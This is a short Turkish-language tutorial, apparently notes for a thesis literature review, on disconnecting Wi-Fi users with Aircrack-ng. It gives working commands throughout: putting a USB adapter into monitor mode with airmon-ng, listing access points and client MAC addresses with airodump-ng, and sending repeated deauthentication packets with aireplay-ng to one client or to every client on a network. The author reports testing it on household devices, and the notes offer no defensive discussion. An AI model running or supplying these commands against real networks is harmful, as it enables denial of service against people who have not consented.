

Aircrack-NG ile Hedefi Hattan Düşürme

(+) Bu yazı birebir tatbik edilmiş olup başarıyla uygulanmıştır.

Önce USB Wifi cihazını Ubuntu ekranının sağ üst köşesinden Disconnect'le.
Sonra aşağıdakilerini gir.

```
> sudo su
> airmon-ng stop wlan2           // wlan2 interface'i USB Wifi'ın interface'dir.
> ifconfig wlan2 down
```

Ardından wlan'ı monitor modda ve channel 4'te başlat.
> airmon-ng start wlan2 4

Aşağıdaki kod ile wlan2'nin yakaladığı paketlerden yola çıkarak AP'ler
ve istemciler sıralanacaktır. Ekranı yansıyan tablomu yapının ikinci
bölümünde (aşağısında) BSSID'ler ve STATION'lar sıralıdır.
BSSID'ler router'ların MAC'ini, STATION'lar ise client'ların MAC'ini
sıralar. İçlerinden birini seçelim.

```
> airodump-ng wlan2
```

NOT: Şayet airodump'ın yukarıdaki kullanımı station'ları ekrana vermezse

> airodump-ng -c 4 --bssid APMacAdresi -w PSK wlan2

komutunu kullan. Böylece ekrana sadece belirlediğin AP'ye bağlı
istemciler gelecektir.

Yukarıdaki kodda seçilen istemci ve ilgili router MAC'lerini aşağıda kul
lanalım. Aşağıdaki kod ile kullanıcıyı 100 defa deauthenticate ederek
internet bağlantısını sekteye uğratmış olacağız.

```
> aireplay-ng -0 100 -a APMacAdresi -c clientMacAdresi wlan2
```

NOT: 100 Rakamı ne kadar fazla olursa istemci o kadar router'la ilişki kesik olacaktır.
Evdeki Iphone telefonumun interneti yukarıdaki kod ile gitmiştir. Deauthenticate pa
ketlerinin gönderimi bittiğinde ise telefonumun interneti otomatikmen geri gelmiş
tir.

Spesifik bir kullanıcıyı değil de ağdaki tüm kullanıcıları deauthenticate
etmek istersek -c parametresini kullanmamamız gerekir. Böylece deauth
enticate paketi broadcast adresine gönderilir ve her istemci hattan düşer.

> aireplay-ng -0 100 -a APMacAdresi wlan2

NOT: Evde wifi'a bağlı kardeşimin bilgisayarını ve yanbaşımındaki iphone
cep telefonumun interneti deauthenticate paketlerinin gönderimi
ile gitmiştir. Deauthenticate paketlerinin gönderimi bittiğinde ise
internet bağlantıları otomatikmen gelmiştir.

Yararlanılan Kaynak

Tez Raporu/Literatür Taraması/BGA/SGK'dan Gelen BGA Dökümanları/53. Ddos
Saldırıları ve Korunma Yolları.docx, Madde 15